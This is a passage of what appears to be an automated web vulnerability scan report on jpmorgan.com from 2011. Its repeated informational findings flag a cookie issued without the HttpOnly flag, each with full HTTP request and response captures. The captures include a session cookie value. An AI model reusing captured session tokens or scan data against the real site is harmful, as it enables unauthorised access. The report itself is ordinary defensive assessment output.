Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
ETag: "32aa93-22ba-5d889a40"
Accept-Ranges: bytes
Content-Length: 8890
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ............................................................w.."..............................
...[SNIP]...

11.608. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_individuals.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/home_individuals.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_individuals.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:15 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
ETag: "32aa96-1a1c-5d889a40"
Accept-Ranges: bytes
Content-Length: 6684
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ............................................................x.."..............................
...[SNIP]...

11.609. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_publicsector.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/home_publicsector.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_publicsector.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
ETag: "32aa95-1a3c-5d889a40"
Accept-Ranges: bytes
Content-Length: 6716
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ............................................................w.."..............................
...[SNIP]...

11.610. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_smallbus.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/home_smallbus.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_smallbus.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
ETag: "32aa94-219a-5d889a40"
Accept-Ranges: bytes
Content-Length: 8602
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ............................................................w.."..............................
...[SNIP]...

11.611. http://www.jpmorgan.com/images/homepage/2008_flash/img/img1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/img1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/img1.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:15 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 17:37:20 GMT
ETag: "32a789-fbc-e3b4f400"
Accept-Ranges: bytes
Content-Length: 4028
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................S.u..
...[SNIP]...

11.612. http://www.jpmorgan.com/images/homepage/2008_flash/img/img2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/img2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/img2.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:15 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT
ETag: "32a78a-191c-e3c43640"
Accept-Ranges: bytes
Content-Length: 6428
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................S.u..
...[SNIP]...

11.613. http://www.jpmorgan.com/images/homepage/2008_flash/img/img3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/img3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/img3.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:15 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT
ETag: "32a78b-176c-e3c43640"
Accept-Ranges: bytes
Content-Length: 5996
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................S.u..
...[SNIP]...

11.614. http://www.jpmorgan.com/images/homepage/2008_flash/img/img4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/img4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/img4.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:15 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT
ETag: "32a78c-10b2-e3c43640"
Accept-Ranges: bytes
Content-Length: 4274
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................S.u..
...[SNIP]...

11.615. http://www.jpmorgan.com/images/homepage/2008_flash/img/img5.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/img5.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/img5.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:15 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT
ETag: "32a78d-1032-e3c43640"
Accept-Ranges: bytes
Content-Length: 4146
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................S.u..
...[SNIP]...

11.616. http://www.jpmorgan.com/images/homepage/2008_flash/img/largeImg4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/largeImg4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/largeImg4.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:32:14 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT
ETag: "32a791-2ebd-e3c43640"
Accept-Ranges: bytes
Content-Length: 11965
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

..................................................................
...[SNIP]...

11.617. http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/swf/module.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/swf/module.swf HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:12 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2008 15:32:28 GMT
ETag: "32a785-6dd6-adc89b00"
Accept-Ranges: bytes
Content-Length: 28118
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-shockwave-flash

CWS    b...x....@SI.?<sSn.Z...A.! (X@."U tQ    $@ A.4...!
".b].4Ae..+....`[.vE.....o&.]w......9wf..9s.........Z.....0.`.:...A.:rOh).*..q.T..=.'8..b....-.... A......;...>/.~..L..^.......8.o..(%.=.~...<..=...
...[SNIP]...

11.618. http://www.jpmorgan.com/images/homepage/2008_flash/xml/module_data.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/xml/module_data.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/xml/module_data.xml HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Apache
Last-Modified: Sat, 23 Aug 2008 13:28:21 GMT
ETag: "32a782-6e9-871d4740"
Accept-Ranges: bytes
Content-Length: 1769
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/xml

<items>
   <item img="img/img1.jpg" largeImg="img/largeImg1.jpg" header="Corporations" link="/pages/jpmorgan/home/corporations"
       >J.P. Morgan offers trusted and intelligent advice to help corporations
...[SNIP]...

11.619. http://www.jpmorgan.com/images/homepage/shadow_bt_820.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/shadow_bt_820.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/shadow_bt_820.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:12 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:03:40 GMT
ETag: "1fc6c-4db-f7a8700"
Accept-Ranges: bytes
Content-Length: 1243
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...4.../.....5.......tEXtSoftware.Adobe ImageReadyq.e<...}IDATx...mn.6..a.v..k.*.W...
.ch..l.k....}9*..zA.............p.^.-....4M!....|........j..s...t
1.4._...|.cK..v......K.?......v*
...[SNIP]...

11.620. http://www.jpmorgan.com/images/homepage/shadow_lt.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/shadow_lt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/shadow_lt.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:12 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:04:04 GMT
ETag: "1fc6d-600-10e8bd00"
Accept-Ranges: bytes
Content-Length: 1536
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR.../..........wJ.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...a..:..%;..;.\u*..d.YBl.e.$..TQ.1.......*.7.?..y.......~]W.uu..O..z?.......}......._.l......9.........R........_..v.p-.
...[SNIP]...

11.621. http://www.jpmorgan.com/images/homepage/shadow_rt.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/shadow_rt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/shadow_rt.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:12 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:04:25 GMT
ETag: "1fc6e-621-12292c40"
Accept-Ranges: bytes
Content-Length: 1569
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR.../..........wJ.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...kn.8..)..jw2..j....I%N...F..CIN....?....H.a.J........Q...j.._.....s..~..m....\.suN....~...G.......Ks^oI.{7...s,.=.L.d
...[SNIP]...

11.622. http://www.jpmorgan.com/images/lightview/close_large.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/close_large.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/close_large.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
ETag: "42d45-412-697f3180"
Accept-Ranges: bytes
Content-Length: 1042
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...M..........@......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y.kSQ....E.P...D).`#.N.tH......A....    t....6[.D......P..4...R...C................w..............z=...V...u.P L.r.q.."..
